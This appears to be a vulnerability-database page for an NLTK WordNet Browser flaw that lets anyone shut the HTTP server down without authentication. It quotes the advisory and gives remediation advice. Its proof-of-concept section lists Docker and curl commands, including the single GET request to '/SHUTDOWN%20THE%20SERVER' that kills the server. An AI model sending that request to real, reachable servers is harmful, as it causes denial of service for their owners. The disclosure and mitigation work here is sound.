Docker
CVE-2026-33231
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from Vendor (https://github.com/nltk/nltk).
CVSS VectorVendor: https://github.com/nltk/nltk
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
2Blast Radius
ecosystem impact- 68 pypi packages depend on nltk (35 direct, 34 indirect)
Ecosystem-wide dependent count for version 3.9.4.
DescriptionCVE.org
Summary
nltk.app.wordnet_app allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple GET /SHUTDOWN%20THE%20SERVER request causes the process to terminate immediately via os._exit(0), resulting in a denial of service.
Details
The vulnerable logic is in nltk/app/wordnet_app.py:
nltk/app/wordnet_app.py:242- The server listens on all interfaces:
server = HTTPServer(("", port), MyServerHandler)nltk/app/wordnet_app.py:87- Incoming requests are checked for the exact path:
if unquote_plus(sp) == "SHUTDOWN THE SERVER":nltk/app/wordnet_app.py:88- The shutdown protection only depends on
server_mode nltk/app/wordnet_app.py:93- In the default mode (
runBrowser=True, thereforeserver_mode=False), the handler terminates the process directly: os._exit(0)
This means any party that can reach the listening port can stop the service with a single unauthenticated GET request when the browser is started in its normal mode.
PoC
- Start the WordNet Browser in Docker in its default mode:
docker run -d --name nltk-wordnet-web-default-retest -p 8004:8004 \
nltk-sandbox \
python -c "import nltk; nltk.download('wordnet', quiet=True); from nltk.app.wordnet_app import wnb; wnb(8004, True)"- Confirm the service is reachable:
curl -s -o /tmp/wn_before.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'Observed result:
200- Trigger shutdown:
curl -s -o /tmp/wn_shutdown.html -w '%{http_code}\n' 'http://127.0.0.1:8004/SHUTDOWN%20THE%20SERVER'Observed result:
000- Verify the service is no longer available:
curl -s -o /tmp/wn_after.html -w '%{http_code}\n' 'http://127.0.0.1:8004/'
docker ps -a --filter name=nltk-wordnet-web-default-retest --format '{{.Names}}\t{{.Status}}'
docker logs nltk-wordnet-web-default-retestObserved results:
000
nltk-wordnet-web-default-retest Exited (0)
Server shutting down!Impact
This is an unauthenticated denial-of-service issue in the NLTK WordNet Browser HTTP server.
Any reachable client can terminate the service remotely when the application is started in its default mode. The impact is limited to service availability, but it is still security-relevant because:
- the route is accessible over HTTP
- no authentication or CSRF-style confirmation is required
- the server listens on all interfaces by default
- the process exits immediately instead of performing a controlled shutdown
This primarily affects users who run nltk.app.wordnet_app and expose or otherwise allow access to its listening port.
AnalysisAI
The NLTK (Natural Language Toolkit) WordNet Browser HTTP server contains an unauthenticated shutdown vulnerability that allows any remote attacker to terminate the service with a single GET request to the '/SHUTDOWN THE SERVER' endpoint. This affects users running nltk.app.wordnet_app in its default mode, where the server binds to all network interfaces without authentication. A proof-of-concept exploit is publicly available demonstrating the denial-of-service attack, though EPSS and KEV data are not yet available for this recent CVE.
Technical ContextAI
NLTK is a widely-used Python library for natural language processing (CPE: pkg:pip/nltk). The vulnerability exists in the WordNet Browser application (nltk.app.wordnet_app), a simple HTTP server built on Python's HTTPServer class for browsing WordNet lexical database. The root cause is CWE-306 (Missing Authentication for Critical Function), where the shutdown route at line 87 of wordnet_app.py checks only for the path string 'SHUTDOWN THE SERVER' via unquote_plus() and verifies server_mode but implements no authentication mechanism. When started in default browser mode (runBrowser=True, server_mode=False), the handler calls os._exit(0) directly, causing immediate process termination without controlled shutdown. The server binds to all interfaces ('0.0.0.0') on the specified port by default, making the vulnerability remotely exploitable.
RemediationAI
Users should monitor the GitHub security advisory at https://github.com/nltk/nltk/security/advisories/GHSA-jm6w-m3j8-898g for patch information and upgrade to the fixed version of NLTK as soon as it becomes available. As immediate mitigations until patching is possible, restrict network access to the WordNet Browser port using firewall rules to allow only localhost connections (127.0.0.1), deploy the service behind a reverse proxy with authentication requirements, or avoid running the WordNet Browser in network-accessible environments. If the service must be exposed, implement network segmentation to limit access to trusted IP ranges only. Consider running the application in server_mode=True if the shutdown functionality is not needed, though this should be verified against the intended use case. Organizations should audit their deployments to determine if they are actually running the WordNet Browser HTTP server, as most NLTK users only utilize the core NLP libraries and are not affected.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Vendor StatusVendor
SUSE
Severity: HighShare
External POC / Exploit Code
Leaving vuln.today
GHSA-jm6w-m3j8-898g